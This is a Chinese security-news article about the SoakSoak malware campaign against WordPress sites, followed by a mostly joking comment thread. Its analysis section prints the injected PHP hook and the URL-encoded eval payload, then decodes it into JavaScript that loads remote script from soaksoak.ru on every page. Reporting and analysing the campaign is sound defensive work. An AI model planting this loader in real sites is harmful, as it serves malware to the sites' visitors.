WordPress是一款使用PHP语言开发的博客平台,用户架设属于自己的博客,也可以把 WordPress当作一个内容管理系统(CMS)来使用。近几个月,WordPress安全漏洞事件频发,包括 免费主题暗藏后门,波及WordPress等知名CMS系统,WordPress 4.0以下版本存在跨站脚本漏洞。而现在,一款广泛传播的恶意软件已经感染了100,000多个WordPress网站,而且数字仍在增加。
Google将超过11,000个域名纳入黑名单
消息先是周日早上在WordPress社区传播,起因是Google将超过11,000域名列入黑名单,这些网站都被一款最新的恶意软件攻击,软件来源于SoakSoak.ru,所以起名为SoakSoak 恶意软件。由于现在互联网上有超过7千万网站使用WordPress,所以这样的恶意软件影响巨大。
一经感染,网站就会出现异常行为,包括重定向到SoakSoak.ru。访问网站的用户也可能会自动下载恶意程序。Google已经将11,000个可能已经感染病毒的网站列入黑名单。
恶意软件分析
恶意软件SoakSoak会修改wp-includes/template-loader.php文件
<?php function FuncQueueObject() { wp_enqueue_script("swfobject"); } add_action("wp_enqueue_scripts",'FuncQueueObject');
这样使得wp-includes/js/swobject.js文件会在每一个页面上加载,这个swobject.js文件包含加密的恶意js代码。
eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
解密后的代码:
eval(decodeURIComponent('( function() { //var ua = navigator.userAgent.toLowerCase(); //if (ua.indexOf('chrome') != -1) return; var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }() );'));
恶意代码一旦被解密,就会加载SoakSoak.ru域名中的js:hxxp://soaksoak.ru/xteas/code
检测与预防
目前尚不清楚病毒是如何感染网站的。如果你正在使用WordPress,并且你担心你的网站被感染,Sucuri公司提供了免费网站扫描,你可以检测你的网站是否感染了病毒。
想要让你的WordPress更加安全,可参见:如何为WordPress做安全防护?
[参考来源THN & Sucuri,译/Sphinx,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]
11月 上海
CIS 2019首席信息安全官闭门高峰论坛11月
CIS 2019议题抢先看10月
公开课双十一活动9月 上海
CIS 2019官网上线,早鸟票同步开售
已有 22 条评论
WP 被干。。。 JM 还不快站出来表示不服!!!!!
天天爆洞,被人日不奇怪好不。
感觉扫一遍压压惊
一洞就洞好多万啊~
他妈的全球 7亿网站试用wp
活跃域名才几千万 他妈的整7亿
喝多就来上班 你们领导不管吗
记者:大爷,您幸福吗?
大爷:幸福,幸福!
记者:大爷,你这么幸福,为什么还要黑seay呢?
大爷:人品差
记者:大妈,您幸福吗?
大妈:俺老伴幸福我就性福!
记者:那大妈您既然这么幸福,为什么也黑seay呢?
大妈:人品差
记者:哎~这美女,您听说过seay吗?
美女:谁不认识啊!
记者:那您觉得他人品差之外,还有什么优点吗?
美女:人品差
记者:帅哥,您幸福吗?
帅哥:seay幸福我就幸福!(一脸猥笑)
记者:(高兴地一跳)终于找到粉丝团了!那么帅哥,您觉得seay给了您什么幸福呢?
帅哥:人品差的人我喜欢,所以我幸福!
记者:seay可是94年耶,你们为什么要黑他呢?
群众:人品差
记者:不仅94年,还P7耶,你们为什么还要黑他呢?
群众:人品差
记者:不仅94年P7,而且还会挖洞呢!你们为什么为什么还要黑他呢??
全国人民:人品差
@ cnseay
记者:大爷,您听说过安利吗?
大爷:嗯?什么玩意?
记者:那大爷,您听说过seay吗?
大爷:卧槽!那愣娃,人品撮得嘿魂,******,就那雕,***
记者:大爷,您的出口话被过滤了
大爷:************ ***** ****** *******
记者:那大爷,那么多人黑seay是不是因为嫉妒羡慕恨呢?
大爷:麻辣隔壁!那愣娃子哟,有啥值碟羡慕的咯,我嫉妒个锤子哟!!****
记者:哇,大爷也是粉丝团的呀!那大爷,您能用一句普通话来表达您的爱慕之情吗?
大爷:滚犊子,你个辣鸡,人品戳就某出来装的啦,低调你懂不懂,你懂吗?不懂就要问啊,你懂不懂?你不懂吧?既然你都不懂你还问个毛线哪???
评论又亮
SEAY比WP还要火啊~
又一个大事件啊~
修复了嘛
为什么要黑seay呢。。。
伙前留名
赞。
The users of WordPress, a free and open source blogging tool as well as content management system (CMS), are being informed of a widespread malware attack campaign that has already compromised more than 100,000 websites worldwide and still counting.
The news broke throughout the WordPress community earlier Sunday morning when Google blacklisted over 11,000 domains due to the latest malware campaign, that has been brought by SoakSoak.ru, thus being dubbed the ‘SoakSoak Malware’ epidemic.
While there are more than 70 million websites on the Internet currently running WordPress, so this malware campaign could be a great threat to those running their websites on WordPress.
—————————————————–
体育老师英文教的不行
如有错误,恳请批评指正
我把70 million 翻错了…,已更正。不知你是不是指这个。
Seam 有装什么B了?小学生表示完全不知呀。
赶紧扫描一下http://www.freebuf.com压压惊
再考虑下
再考虑下